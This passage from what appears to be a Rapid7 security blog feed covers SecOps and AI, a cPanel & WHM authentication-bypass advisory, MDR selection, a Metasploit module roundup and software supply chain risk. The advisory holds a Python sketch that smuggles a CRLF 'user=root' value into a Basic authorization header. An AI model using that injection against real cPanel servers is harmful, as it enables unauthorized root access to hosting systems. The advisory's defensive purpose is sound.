At the same time, burnout remains a structural issue. When experienced analysts leave, institutional knowledge leaves with them. And no tool can replace that. For leaders, this reinforces the point that people strategy is core to the overall security strategy.

AI in SecOps is getting very real, and very practical

After a long hype cycle, the AI conversation is now far more grounded. The most credible use cases in SecOps are about helping teams manage volume, reduce noise, and move faster with better context.

The examples discussed in the session were telling: alert-assisted triage, natural-language log querying, incident summarisation, first-draft executive communications, and eventually more automated investigation workflows. The framing that landed best was AI as a ‘sidearm partner’; a force multiplier for experienced practitioners, rather than a substitute for judgment.

That distinction matters as human judgment is essential. But AI is becoming increasingly valuable for understaffed teams trying to scale operations and preserve the institutional knowledge that walks out the door when analysts move on.

Governing agentic AI begins with foundations you should already have

As the discussion turned to agentic AI, the focus centred on how more autonomous AI systems do introduce new governance questions, but many of the relevant controls already exist within mature security programs. Segmentation, least privilege, access management, and strong architectural boundaries remain the core defenses.

One analogy stuck: Just as graphite rods slow a nuclear chain reaction, controls like network segmentation and access boundaries can contain and constrain agentic behavior. The organizations best positioned for AI governance are often the ones that have already invested in zero trust principles and sound identity controls.

That reframes the conversation. AI governance isn’t a separate discipline; it’s the extension of existing security foundations into how AI systems behave, access data, and operate within defined boundaries.

What this means for the road ahead

If there was a unifying message, it was that the modern SecOps mandate is bigger than prevention. The industry has, to some extent, over-rotated on stopping threats and under-invested in resilience. 

Security leaders require programs that communicate risk in business terms, make smart technology trade-offs, support their people, and adopt AI in ways that are practical and governable. The organizations that get this right will be the ones building strong foundations and using the right mix of platform, process, and intelligence to move faster and more confidently. 
Rapid7 is committed to being a partner to organizations looking to gain that confidence. Our exposure-informed MDR service empowers teams to adopt a more preemptive security posture by rapidly identifying high-impact exposures that could be imminent breach targets. Teams can also leverage expanded capabilities in data security posture management (DSPM) and compliance to help fortify assessment, prioritization, and response capabilities so they can further preempt attacks across the modern attack surface.

CVE-2026-41940: cPanel & WHM Authentication Bypass

By: Rapid7
29 April 2026 at 16:00

Overview

On April 28, 2026, cPanel issued a security update to fix a critical vulnerability affecting the cPanel & WHM and WP Squared products. In the cPanel release notes, the bug was described as "an issue with session loading and saving." CVE-2026-41940, the identifier subsequently assigned on April 29, 2026, has a CVSS score of 9.8 and allows unauthenticated remote attackers to bypass authentication and gain unauthorized administrative access to the affected systems. First-party cPanel & WHM and WP Squared vendor advisories are available.

cPanel & WHM is web hosting control panel software used to manage websites and servers. WHM provides root-level administration, while cPanel acts as the user-facing interface. Successful exploitation of CVE-2026-41940 grants an attacker control over the cPanel host system, its configurations and databases, and websites it manages. A naive Shodan query for potential targets returns approximately 1.5 million cPanel instances exposed to the internet that may be vulnerable.

Managed cPanel hosting provider KnownHost has stated that CVE-2026-41940 is actively being exploited in the wild, with speculation that targeted zero-day exploitation began as early as February 23, 2026, prior to the vulnerability’s public disclosure. Security firm watchTowr has published a technical analysis and proof-of-concept exploit for CVE-2026-41940. As such, widespread exploitation in the wild is expected to be imminent.

Technical overview

Systems exposing the affected web service software are vulnerable by default.

As of April 29, 2026, a technical analysis and proof-of-concept exploit have been published by security firm watchTowr. CVE-2026-41940 is an authentication bypass caused by a Carriage Return Line Feed (CRLF) injection in the login and session loading processes of cPanel & WHM.

Before authentication occurs, `cpsrvd` (the cPanel service daemon) writes a new session file to the disk. The vulnerability allows an attacker to manipulate the `whostmgrsession` cookie by omitting an expected segment of the cookie value, avoiding the encryption process typically applied to an attacker-provided value. Attackers can inject raw `\r\n` characters via a malicious basic authorization header, and the system subsequently writes the session file without sanitizing the data. As a result, the attacker can insert arbitrary properties, such as `user=root`, into their session file. After triggering a reload of the session from the file, the attacker establishes administrator-level access for their token.
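The injection primitive can be sketched as follows. This is only an illustration of the CRLF technique described above, using hypothetical field names rather than the exact tokens from the watchTowr analysis:

```python
import base64

# Hypothetical illustration of CRLF injection via a Basic authorization
# header. The credential value smuggles a raw "\r\n" so that a naive,
# line-oriented session-file writer persists an attacker-chosen property.
payload = "attacker:pass\r\nuser=root\r\n"   # "user=root" is the injected line
header_value = "Basic " + base64.b64encode(payload.encode()).decode()

# A writer that decodes the header and splits on CRLF without sanitizing
# would record "user=root" as its own session property line.
decoded = base64.b64decode(header_value.split(" ", 1)[1]).decode()
lines = decoded.split("\r\n")
print(lines)
```

Because the injected bytes ride inside a base64-encoded header, they pass through HTTP parsing intact and only become line separators when the server decodes and persists the value.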

Mitigation guidance

Organizations running on-premise instances of cPanel & WHM or WP Squared should prioritize upgrading to a fixed version on an emergency basis. Some hosting providers have opted to temporarily institute workaround TCP port blocks for cPanel & WHM web services on ports 2083 and 2087. However, defenders are strongly advised to patch, rather than implement workarounds.

Affected Software:

The vendor states that all versions after 11.40 and prior to the following fixed versions are affected.

  • cPanel & WHM 11.86.0 versions prior to fixed version 11.86.0.41
  • cPanel & WHM 11.110.0 versions prior to fixed version 11.110.0.97
  • cPanel & WHM 11.118.0 versions prior to fixed version 11.118.0.63
  • cPanel & WHM 11.126.0 versions prior to fixed version 11.126.0.54
  • cPanel & WHM 11.130.0 versions prior to fixed version 11.130.0.19
  • cPanel & WHM 11.132.0 versions prior to fixed version 11.132.0.29
  • cPanel & WHM 11.134.0 versions prior to fixed version 11.134.0.20
  • cPanel & WHM 11.136.0 versions prior to fixed version 11.136.0.5
  • WP Squared versions prior to fixed version 136.1.7

Please read the vendor advisory for the latest guidance.
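The version logic above can be sketched as a rough helper. This is illustrative only: it assumes dotted four-part cPanel & WHM version strings, ignores WP Squared, and should not replace the vendor's own guidance:

```python
# Sketch: is an installed cPanel & WHM version in the affected range?
# Fixed versions are taken from the advisory list above.
FIXED = {
    (11, 86, 0): (11, 86, 0, 41),
    (11, 110, 0): (11, 110, 0, 97),
    (11, 118, 0): (11, 118, 0, 63),
    (11, 126, 0): (11, 126, 0, 54),
    (11, 130, 0): (11, 130, 0, 19),
    (11, 132, 0): (11, 132, 0, 29),
    (11, 134, 0): (11, 134, 0, 20),
    (11, 136, 0): (11, 136, 0, 5),
}

def parse(version: str) -> tuple:
    """Turn '11.110.0.96' into (11, 110, 0, 96) for tuple comparison."""
    return tuple(int(part) for part in version.split("."))

def is_affected(version: str) -> bool:
    v = parse(version)
    if v <= (11, 40):       # vendor: only versions after 11.40 are affected
        return False
    fixed = FIXED.get(v[:3])
    if fixed is None:
        return True         # unknown branch: assume affected, confirm with vendor
    return v < fixed
```

For example, `is_affected("11.110.0.96")` is true while `is_affected("11.110.0.97")` is false, matching the fixed version in that branch.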

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-41940 with authenticated vulnerability checks available in the April 30, 2026 content release.

Updates

  • April 29, 2026: Initial publication.
  • April 30, 2026: Update mitigation guidance with additional fixed version numbers and change wording to reflect availability of vulnerability checks.

Experts on Experts: The 2026 Threat Landscape is Moving Faster than Defenders Expect

29 April 2026 at 08:27

This week on Experts on Experts, I’m joined by Christiaan Beek, Rapid7’s VP of Threat Analytics, to talk through what we’re seeing in the 2026 threat landscape and how it connects to recent research coming out of Rapid7 Labs.

We start with the report, but quickly move into what’s already playing out in active campaigns. What stands out is not a change in attacker technique, but the pace. Weak credentials, missing MFA, exposed services, and unpatched systems still drive most intrusions. What has changed is how quickly those conditions are identified and exploited, and that shift is forcing security teams to rethink how they prioritize and respond.

The window to act is disappearing

One of the clearest themes in the conversation is timing. The issue is no longer how many vulnerabilities exist, but how quickly they are being used. The gap between disclosure and exploitation has narrowed to a matter of days in many cases, which removes the buffer teams used to rely on.

At the same time, most intrusions still begin with familiar conditions. Identity and access remain consistent weaknesses, with missing MFA and exposed remote access continuing to provide reliable entry points. What has changed is how those weaknesses are used. Access is now packaged and sold through a broader ecosystem, which increases both the speed and scale of attacks.

Access, persistence, and trusted systems

We also look at how attacker behaviour is evolving beyond initial access. In some environments, the goal is no longer immediate disruption but long-term presence. That changes how teams should think about detection, because finding activity is only the starting point. Understanding how long access has existed and what has already happened becomes just as important.

At the same time, attacks are concentrating inside systems organizations rely on every day. Identity platforms, cloud environments, and collaboration tools are all becoming key targets. The challenge is that activity in these systems often looks legitimate, which makes it harder to distinguish between normal behaviour and something that requires investigation.

AI is accelerating what already works

AI is part of this shift, but not because it introduces entirely new attack paths. What it does is make existing techniques faster and easier to scale, particularly in areas like social engineering and reconnaissance. Attackers can generate and adapt campaigns quickly, while defenders are dealing with increasing volumes of data.

That creates a simple but important shift. Security teams are not falling behind because they lack tools, but because the timing of attacks has changed and their processes have not kept up. The focus now is on understanding exposure earlier, prioritizing what matters, and preparing actions in advance.

Watch the full episode below to hear Christiaan’s perspective on how these trends are evolving and what they mean for security leaders heading into 2026.

Get Motivated: What to Expect from Our Keynote at Rapid7's Global Cybersecurity Summit

28 April 2026 at 09:42

Security teams prepare for incidents every day. Alerts are tuned, playbooks are built, and processes are tested. But when something actually happens, the challenge shifts. It becomes not just about making decisions under pressure, but about how well that preparation has set teams up to make the right ones when things heat up.

At this year’s Rapid7 Global Cybersecurity Summit, our keynote Persistence Under Pressure explores that shift directly. Former Special Forces operator Jason Fox draws on experience from environments where timing, clarity, and execution all have immediate consequences, and shows how that mindset translates to modern security operations, where teams are expected to act quickly, often without complete information.

The parallels are clear: Incidents do not unfold in controlled conditions. Signals compete for attention, priorities shift, and decisions need to be made in real time. What matters in those moments is not just having the right tools, but knowing how to stay focused and act with confidence.

This session explores practical ideas that apply directly to security teams, from how preparation shapes response to how understanding the adversary influences decision-making, and why composure and clarity can make the difference when pressure builds.

It also reinforces a broader theme running throughout the summit. Preemptive security operations are not only about detecting threats earlier but about enabling better decisions across the entire lifecycle, from preparation through to response and recovery.

If you are looking to understand how security operations are evolving, this session offers a different but valuable perspective. One that connects strategy and technology back to the people responsible for making it work.

Join us May 12–13 and hear how these principles apply in practice. Register now.

MDR Selection is a Partnership Decision

28 April 2026 at 04:00

Managed Detection and Response (MDR) is a cybersecurity service that combines human expertise and technology to detect, investigate, and respond to threats 24/7.

I write this as a Field CISO at Rapid7, but also as someone who has had to live with the operational reality of MDR on the customer side. I have seen what happens when a service is a black box, when technology and service drift apart, and when cost, retention, and accountability are misaligned. That experience shapes the view in this piece: MDR selection is not just about buying monitoring in isolation, but about choosing a partner that can help your team reduce risk and improve the way security operates over time.

When organisations evaluate MDR, they often start in the wrong place. The discussion begins with integration counts, dashboards, pricing tables, and increasingly bold claims about AI or dramatic reductions in alert volume. Those things all matter to a degree, but they are not the centre of the decision. The real question is whether you are choosing a provider that will work as a genuine partner, help you reduce risk over time, and strengthen the way your team operates when the environment becomes noisy, complex, or difficult to manage.

That matters because MDR is not a service that sits neatly off to one side of the security function. It becomes part of the operating model. It influences how visibility is created, how incidents are handled, how priorities are surfaced, and how much confidence a leadership team has in the people and processes around it. For that reason, I do not think MDR selection is primarily a tooling exercise. It is a partnership decision.

What poor MDR looks like in practice

My own view on this has been shaped by more than one experience. In one case, our MSSP was part of a defence company that was later carved out into a separate business. The service was built around a legacy SIEM. There was plenty of interest in automation and future-state capability, but the fundamentals were being missed. We could talk about what we wanted to automate, but not with enough confidence in the quality of the underlying visibility, the operational process around it, or how the service was supposed to mature over time.

In another case, the issue was an MSSP overlay wrapped around a well-known, high-cost log indexer. On paper, that should have been a strong foundation. In practice, the management layer around it was poor. There was a lack of expertise, no credible roadmap, and very little meaningful tuning. As the MSSP was also reselling the ingest, there was no obvious incentive to optimize data use in the customer’s favour. Ingest was capped because of cost, retention was limited to 90 days, and we were left with the uncomfortable combination of high spend, constrained visibility, and a service that did not appear to be improving in any meaningful way.

Those experiences shaped how I think about MDR because they exposed the same underlying problem. The technology was not absent, but the service model around it was weak. When the gap between the platform and the service becomes too wide, the customer ends up paying for capability in theory while carrying the operational risk in practice.

Why the gap between platform and service matters

This is where many MDR relationships start to fail. Even when the tooling is capable, the provider still has to connect platform, people, process, and commercial model into one coherent service. If that does not happen, the customer ends up living with support issues, awkward hand-offs, misaligned contracts, unclear accountability, and a constant sense that there are too many moving parts and not enough ownership.

That is why I would start any MDR evaluation by looking at how the relationship is meant to work in practice. 

  • Does the provider genuinely own the experience end to end, or are they effectively brokering one element through another?

  • Can they show how the programme will improve over the first year, not just how onboarding works in the first month?

  • Do they understand the rest of your security ecosystem and how to operate within it, or do they assume every answer involves expanding their footprint?

Strong providers think holistically. They understand that the customer already has an environment to manage, existing tools to work with, and internal teams who need clarity rather than additional friction. They think in terms of operating model, monitoring, response, and continuous improvement over time, rather than treating the service as a thin wrapper around a platform. That is usually where the difference between coverage and real partnership becomes obvious.

Proactive defense starts with the fundamentals

True partnership is defined by its ability to deliver proactive defense and continuous improvement. By this, I do not just mean threat hunting or faster triage. I mean exposure reduction in the broader sense. It is understanding attack paths, using intelligence well, tuning detections properly, improving visibility where it matters, and building a service rhythm that reduces the conditions attackers rely on.

That sounds obvious, but it is surprisingly easy for organisations to be distracted from those fundamentals. Low entry prices often mask a fundamentally constrained operating model, shifting risk and cost back to the customer. 

Sweeping promises about single-digit alert volumes should be treated carefully, especially before a provider has properly understood the environment. The same is true of broad agentic AI claims. Automation can absolutely help, but it does not replace accountability, operational judgement, or the need for a provider to show how the service will improve over time.

For me, that last point is one of the clearest tests of whether the relationship is working. An MDR service should not be something you set and forget. A mature partnership should look better in month twelve than it did in month one. Visibility should improve. Tuning should improve. The roadmap should improve. Confidence in escalation and response should improve. If none of that is happening, it becomes very difficult to describe the relationship as a real partnership. At that point, you may simply have outsourced a queue.

When displacement becomes the right answer

That is also how I think about displacement. An incumbent should not be displaced simply because another provider has a sharper demo or a more fashionable story. Displacement makes sense when the existing model has stopped improving, when the service feels static or opaque, when the team lacks the expertise to tune and evolve it properly, or when the commercial structure and delivery model are working against the customer rather than with them.

If the relationship is held together by workarounds, if there is no meaningful roadmap, or if the customer is left carrying too much of the integration and governance burden themselves, the problem is usually structural rather than temporary. In that situation, the question is no longer whether the service can be tweaked around the edges. The question is whether the model is fit for purpose at all.

Consolidation is only useful if it improves the model

That does not automatically mean consolidation is the answer. Consolidation can be valuable, but only when it improves the operating model rather than simply reducing the number of logos in the environment. In some cases, the right answer will be to build a broader relationship with a provider that has earned trust and shown it can deliver more. In others, the right answer will be better integration and a clearer division of responsibilities.

What matters is whether the provider helps create a more coherent, scalable, and accountable way of operating. If consolidation leads to better hand-offs, stronger accountability, and a simpler way of reducing risk, it can be very valuable. If it does not, then consolidation is not the point. A better operating model is.

This broader view is also consistent with established security guidance. NIST CSF 2.0 frames cybersecurity as a risk management discipline across governance, protection, detection, response, and recovery [1]. NIST’s latest incident response guidance reinforces that response should be integrated into wider risk management and improved over time [2]. The NCSC makes a similar point in its guidance on building a SOC and on security monitoring, where tools, skills, and operating model all need to work together [3]. CISA’s exposure reduction guidance points in the same direction by focusing on reducing the conditions attackers rely on before incidents escalate [4].

Questions worth asking any MDR provider

There are a few practical questions I would encourage any CISO, Security Director, or Security Operations Manager to ask, whether they are reviewing an incumbent or evaluating a new provider:

  • How will the service improve over the first year and beyond?

  • Where do the hand-offs happen between your platform, your analysts, and my team?

  • How do you work with the security and IT tools we already rely on?

  • How predictable is the commercial model as coverage expands?

  • What are you doing to reduce risk before the next incident, not just respond after it?

  • If your commercial model benefits from more ingest, what incentive do you have to tune it down?

Those questions reveal far more than a polished demo ever will.

Ultimately, the organisations that get the most value from MDR tend to be the ones that treat it as part of a wider security partnership rather than a neatly outsourced function. They expect transparency, progress, and a provider that understands both the environment they have today and the operating model they are trying to build over time. That is the standard worth holding. If the provider is not improving the programme over time, you do not have a real partnership. And if consolidation does not lead to a better operating model, it is probably not worth doing in the first place.

Learn more about Rapid7's approach to preemptive MDR.

Alan Simpson is Field CISO for the UK and Ireland at Rapid7, advising CISOs and senior leaders on cyber risk, resilience, and security strategy that supports business outcomes. Before joining Rapid7, he served as Global Security Operations Manager and Acting CISO at Keyloop, where he led security operations and wider information security initiatives. He has also held senior security leadership roles at Allianz and LV=, with experience across security operations, incident response, architecture, awareness, supplier assurance, and security testing.

[1] https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.29.pdf

[2] https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r3.pdf

[3] https://www.ncsc.gov.uk/collection/building-a-security-operations-centre

[4] https://www.cisa.gov/resources-tools/resources/exposure-reduction

Metasploit Wrap-Up 04/25/2026

24 April 2026 at 16:17

Check Method Visibility

Metasploit has supported check methods for many years now. It’s not always desirable to jump straight into exploiting a vulnerability; often you first want to determine whether the target is actually vulnerable. Metasploit tries to be very conservative, only classifying a target as “vulnerable” when the vulnerability is leveraged as part of the check method, and reserving the “appears” status for version checks. The different check codes a module is capable of returning, and the logic used to select among them, vary from exploit to exploit and are not always easy to understand. In line with the consistent feedback Metasploit has received that module actions should be more transparent, adfoster-r7 has been adding reasoning information en masse to the check codes returned by a variety of exploits. This information will help users understand why a particular vulnerability status was determined, making troubleshooting easier and increasing confidence in the results.
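The distinction between check statuses, and the value of attaching reasoning to them, can be sketched in Python. This is an illustration of the idea only, not Metasploit's Ruby CheckCode API, and the version threshold is made up:

```python
from dataclasses import dataclass
from typing import Optional

@dataclass
class CheckResult:
    code: str     # "vulnerable", "appears", or "safe"
    reason: str   # human-readable explanation of how the status was chosen

def check(version: str, probe_succeeded: Optional[bool]) -> CheckResult:
    """Prefer behavior-based evidence; fall back to a version comparison."""
    if probe_succeeded is True:
        # The flaw was actually triggered: strongest possible evidence.
        return CheckResult("vulnerable", "check probe triggered the vulnerability")
    if probe_succeeded is False:
        return CheckResult("safe", "check probe ran but the flaw did not trigger")
    # No active probe available: a version match only justifies "appears".
    if version < "2.0":   # hypothetical affected range for this sketch
        return CheckResult("appears", f"version {version} is in the affected range")
    return CheckResult("safe", f"version {version} is outside the affected range")
```

The attached `reason` string is the point: a user seeing "appears" can tell it came from a version comparison rather than a live probe.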

Legacy SMB Improvements

This week, community member g0tmi1k made multiple improvements for legacy and non-Windows SMB targets. Version information is now more reliably extracted from targets running SMB 1, and a variety of minor bugs were fixed across multiple modules that affected users targeting systems a module was not intended for, as is often the case when a module is used to scan an entire network.

New module content (4)

Camaleon CMS Directory Traversal CVE-2024-46987

Authors: Goultarde, Peter Stockli, and bootstrapbool

Type: Auxiliary

Pull request: #21122 contributed by bootstrapbool

Path: gather/camaleon_download_private_file

AttackerKB reference: CVE-2024-46987

Description: This adds an auxiliary module to exploit an arbitrary file read vulnerability, CVE-2024-46987, in Camaleon CMS >= 2.8.0 as well as 2.9.0.

Langflow RCE

Authors: Takahiro Yokoyama and weblover12

Type: Exploit

Pull request: #21260 contributed by Takahiro-Yoko

Path: multi/http/langflow_rce_cve_2026_27966

AttackerKB reference: CVE-2026-27966

Description: Adds an exploit module for CVE-2026-27966, a prompt injection RCE vulnerability in Langflow < 1.8.0. By creating and sending a specially crafted flow containing Python code, an attacker can get that code executed, because LangChain's Read-Eval-Print Loop (REPL) is exposed by default and runs any Python code it is given.
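The underlying risk is easy to demonstrate: any service that passes attacker-controlled strings to a Python REPL or `exec` grants full code execution with the host process's privileges. A minimal illustration (not Langflow's actual code):

```python
# Illustration only: why an exposed Python REPL equals remote code
# execution. This mimics the failure mode, not Langflow internals.

def naive_repl(untrusted_input: str) -> dict:
    scope: dict = {}
    exec(untrusted_input, scope)  # no sandboxing: full interpreter access
    return scope

# An "innocent-looking" flow payload can import modules and run anything.
result = naive_repl("import os; cwd = os.getcwd()")
print(result["cwd"])
```

Anything reachable from the interpreter, including `os`, `subprocess`, and the filesystem, is reachable from the attacker's string, which is why REPL-style tools need strict sandboxing or authentication in front of them.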

WebDAV PHP Upload

Authors: g0tmi1k and theLightCosine theLightCosine@metasploit.com

Type: Exploit

Pull request: #21256 contributed by g0tmi1k

Path: multi/http/webdav_upload_php

AttackerKB reference: CVE-2012-10062

Description: Updates code and adds features: Linux support, check() method, and cleanup after exploit.

Linux Chmod

Author: bcoles bcoles@gmail.com

Type: Payload (Single)

Pull request: #21238 contributed by bcoles

Path: linux/loongarch64/chmod

Description: Adds a new linux/loongarch64/chmod payload to change the permissions of a specified file.

Enhancements and features (11)

  • #21019 from g0tmi1k - This adds support for phpMyAdmin v3.1.x to the phpMyAdmin Config File Code Injection module (CVE-2009-1285). This also adds a check method.
  • #21230 from bcoles - Reduces the memory footprint of the module metadata cache in Metasploit.
  • #21231 from bcoles - Improves the performance of the module metadata cache and fixes several related bugs.
  • #21232 from bcoles - Add a method to discover writable directories on Unix targets using the find command.
  • #21256 from g0tmi1k - Updates code and adds features: Linux support, check() method, and cleanup after exploit.
  • #21347

Bugs fixed (4)

  • #21327 from tair-m - Fixes a crash when loading HTTP modules.
  • #21341 from g0tmi1k - This fixes multiple issues related to various SMB modules when targeting Samba.
  • #21344 from adfoster-r7 - Fixes a bug when running the check method for scanner/http/elasticsearch_traversal against non-vulnerable targets.
  • #21346 from adfoster-r7 - Fixes a false positive that was present in auxiliary/scanner/couchdb/couchdb_enum.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition, Metasploit Pro.

3 Reasons to Attend our Global Cybersecurity Summit if you’re Focused on AI, Threats, and CTEM

24 April 2026 at 09:07

Security teams are dealing with a different kind of pressure now. It is not just the volume of alerts or the pace of attacks, but also the gap between what teams can see and what they can act on with confidence.

That gap shows up in different ways. Threats move across identity and cloud in ways that are difficult to track, exposure data exists but often sits disconnected from response, and AI is being introduced into workflows without a clear role in decision-making.

This year’s Rapid7 Global Cybersecurity Summit brings those threads together as part of the same operational solution.

1. You need a clearer view of how attacks actually unfold

A lot of detection strategies still assume attacks follow a clean path. In practice, they do not. They start in one place, move quickly, and often rely on small gaps rather than obvious failures.

Sessions like The Reality of Running a SOC in 2026 break this down in detail, looking at how attacks begin with things like identity misuse or cloud misconfiguration, then evolve as defenders try to keep up. That matters because it changes how detection should be designed. Coverage alone is not enough if teams do not have the context created by strong exposure management to interpret what they are seeing.

That same idea carries into Inside the Modern SOC, where a real investigation is followed from first alert to outcome. It is a useful reminder that detection is only part of the problem. Deciding how to respond, and doing it quickly, is the critical next step.

2. Exposure only matters if it connects to action

Most teams already have some form of exposure management in place. The challenge is making it useful. A long list of vulnerabilities does not help much if it is not tied to how risk actually shows up in the environment.

Sessions like Beyond the Vulnerability List and From Cloud Exposure to Runtime Attack focus on that connection. They look at how exposures turn into active threats, often before any alert is triggered, and how teams can use that information to prioritize earlier.

Here’s the part people miss. Exposure is not just about knowing what is wrong. It is about understanding what matters now, based on how the environment is being used and how attackers are likely to move through it.

3. AI is only useful if it improves decisions

AI is already part of most security conversations, but the reality is nuanced. In some cases it helps reduce noise and speed up investigations. In others, it creates new questions around trust and transparency.

The AI Dilemma: Automating Defense Without Surrendering Judgment tackles this directly. It looks at where AI is helping in real SOC workflows, where it can get in the way, and why explainability matters if teams are going to rely on it. The discussion is grounded in how analysts actually work, not just what the technology promises.

There is also a broader point here. Attackers are using AI as well, which means the balance between speed and accuracy is becoming more important on both sides.

Join the conversation

Across these sessions, the common thread is not any single technology. It is how teams connect signals, context, and decisions in a way that holds up under pressure, which shows up in how threats are understood, how exposure is prioritized, and how AI is applied. It is also why the summit is structured the way it is, moving from shared context on day one into more focused, role-based sessions on day two.

More sessions and speakers will be added in the coming weeks, but the direction is already clear. Security operations are shifting toward earlier decisions, better prioritization, and fewer assumptions.

If your work touches AI, threat detection, or exposure management, this is where those conversations start to come together.

Join us May 12–13 and see how teams are approaching it in practice.

Register now.

AI is Changing Vulnerability Discovery and your Software Supply Chain Strategy has to Change with it

23 April 2026 at 09:25

Wade Woolwine is Senior Director, Product Security at Rapid7.

The headlines around Glasswing have focused on how quickly AI can surface vulnerabilities, which has naturally caught the attention of security leaders. In my conversations with teams and customers, the more useful discussion has been about what that speed means in practice for business protection, especially across open source risk, dependency choices, and software supply chain resilience. The deeper issue for security leaders sits elsewhere. 

Software risk is becoming harder to manage across the full lifecycle, especially in open source dependencies, build pipelines, developer environments, and the operational processes that sit between disclosure and remediation. When vulnerabilities can be found faster and at greater depth, security teams need more than another source of findings. They need a stronger way to understand what they run, what they trust, what they can patch quickly, and where a single weak dependency can create disproportionate risk.

Faster discovery makes software supply chain resilience a more immediate leadership issue. CISOs need a clearer view of how dependencies are chosen, monitored, validated, and governed across production, build, and developer environments, especially as open source remains essential to modern software development.

Organizations already struggle to absorb vulnerability disclosures at the pace they arrive, and when discovery gets faster, the operational gap widens between knowing there is a problem and being able to do something useful about it. That gap is especially serious in the software supply chain, where a single dependency can introduce risk into build systems, production workloads, developer endpoints, and the tools used to secure them.

This is why I would frame AI-driven vulnerability discovery risk as a lifecycle challenge. The pressure does not sit in one place, but across inventory, dependency decisions, threat intelligence, patching discipline, and validation – with people, process, and visibility shaping how well an organization can respond. Technology matters, but it cannot compensate for a weak operating model underneath it.

Open source still matters. Dependency choices matter more.

Open source remains essential to modern software development because it helps teams move faster and get products to market without rebuilding common functionality from scratch. Abandoning it is not a realistic option; the better response is to be more deliberate about where and how third-party code enters the environment.

Open source has always involved a trade-off between speed, efficiency, flexibility, and inherited risk, and that trade-off becomes harder to manage as AI makes code review deeper and faster. More flaws and supply chain compromises will likely be found in packages that teams have trusted for years, including transitive dependencies most developers did not knowingly choose. One only needs to look back a few weeks to find that the widely used Axios package suffered a supply chain compromise that bundled a Remote Access Trojan (RAT) designed to steal secrets. That raises the value of understanding which dependencies are essential, which ones can be removed, which ones pull in large chains of transitives, and which ones are maintained by too few people to inspire confidence.

That work starts with a more disciplined question than “Is there a package that does this?” It starts with “Do we need this dependency, and do we understand the risk that comes with it?” The safest dependency is often the one that never enters the environment in the first place.

Why inventory has to go deeper than package lists

Supply chain resilience begins with knowing what you are actually running, which sounds straightforward until a critical disclosure lands in a package no one realized was in the environment three layers deep. Dependency graphs are deeper than most teams think, and transitive risk is where a lot of operational pain begins. A package chosen directly by a developer may bring in dozens of additional packages, each with its own maintainers, release cadence, security posture, and potential failure points.

A mature approach to inventory needs to move beyond a static package list, because CISOs need confidence in three views at once: what is declared in source, what is resolved and built, and what is actually running in production. Those views often drift apart over time, which means a package can be patched in source and still remain unpatched in a deployed container or runtime environment. An SBOM on its own will not close that gap; continuous, usable inventory will.
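The three-view drift can be made concrete with a toy comparison. A minimal sketch (hypothetical package data, not a real SBOM format) that flags packages whose declared, resolved, and running versions disagree:

```python
def sbom_drift(declared, resolved, running):
    """Compare three package->version views (source, build, runtime) and
    return the packages where they disagree -- the drift a one-off SBOM
    snapshot alone will not surface."""
    drift = {}
    for pkg in set(declared) | set(resolved) | set(running):
        versions = (declared.get(pkg), resolved.get(pkg), running.get(pkg))
        if len(set(versions)) > 1:  # any disagreement, including absence
            drift[pkg] = versions
    return drift

# A patched source tree whose deployed container still runs the old version:
print(sbom_drift({"axios": "1.7.2"}, {"axios": "1.7.2"}, {"axios": "1.6.0"}))
# → {'axios': ('1.7.2', '1.7.2', '1.6.0')}
```

Running such a comparison continuously, rather than at audit time, is what turns an SBOM into the usable inventory described above.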

That inventory also needs clear ownership attached to it, because the moment a critical dependency is identified, someone has to decide what happens next, coordinate the change, and absorb the operational consequences. Security teams cannot do that well if responsibility is unclear, which is why ownership needs to be treated as part of resilience rather than an administrative detail.

Build pipelines and developer environments deserve the same scrutiny as production

Supply chain conversations still tend to start with production systems, even though recent incidents have shown how quickly compromise can move through the build layer, developer tooling, or the security tooling inside the pipeline itself. Those environments hold code, secrets, and trust relationships that attackers know how to exploit, while developer workstations often carry a rich mix of credentials and elevated privileges because speed matters to the business. Build systems are predictable and privileged, which makes them both valuable and vulnerable, but also easier to monitor.

Seeing those layers as part of the same attack surface means asking harder questions about how code enters the build, how package updates are governed, how actions and dependencies are pinned, what secrets exist in CI/CD, and what controls are in place on developer endpoints to detect anomalous behavior or stop high-risk package activity before it goes unnoticed.

You can gauge the maturity of the operating model with the answers to a few basic questions:

  • How tightly are dependencies controlled in CI?

  • How are package lifecycle scripts governed?

  • What secrets exist in CI/CD, and what protections surround them?

  • What visibility exists into anomalous behavior on developer endpoints?

  • How would the team detect or prevent high-risk package activity before it spreads?

If those answers are unclear, important parts of the model are still missing.

Why prioritization matters more as scanning accelerates

When software risk rises, the instinct is often to add another scanner because more visibility feels like progress. What matters more over time, though, is how well teams can prioritize the findings that follow, assign them to the right owner, choose the right mitigation, and prove that exposure actually went down. Broader scanning and faster discovery mostly add to the pile unless the operating model behind them is strong enough to turn findings into action. Feed more issues into a process that is already stretched and the backlog grows, priorities become harder to sort, and remediation slows in the places where speed matters most. The organizations that come through this period well will be the ones that treat supply chain resilience as a systems problem, with stronger intake, clearer governance, better intelligence, and faster paths from alert to action.

What stronger software supply chain resilience looks like in practice

A stronger response starts with a deeper inventory of dependencies across source, build, and runtime, so teams can see both direct and transitive packages and connect them back to real environments and real owners. Once that picture is in place, intelligence monitoring becomes far more useful when it runs continuously against credible signals on vulnerabilities, package risk, maintainer health, end-of-life software, and unusual changes in dependency behavior.

The same level of care needs to carry through into dependency governance, where better decisions depend on asking whether a new package is necessary, how much transitive risk it introduces, whether its maintenance model is healthy, and what policy governs its path into production. Build and developer controls belong in that same conversation, because version pinning, private registries, secret handling, script restrictions, immutable builds, ephemeral runners, and stronger endpoint monitoring all reduce the attack surface around the software supply chain.

Monitoring threat intelligence for notifications about new vulnerabilities and compromised packages, and having a well-defined, practiced process for scoping and remediating emerging threats, becomes critical. Your supply chain vulnerability and compromise response should be rehearsed, just like your incident response plan, through tabletop exercises and simulated threat events. You don’t want to wait until the house is on fire to learn how to execute an effective response.

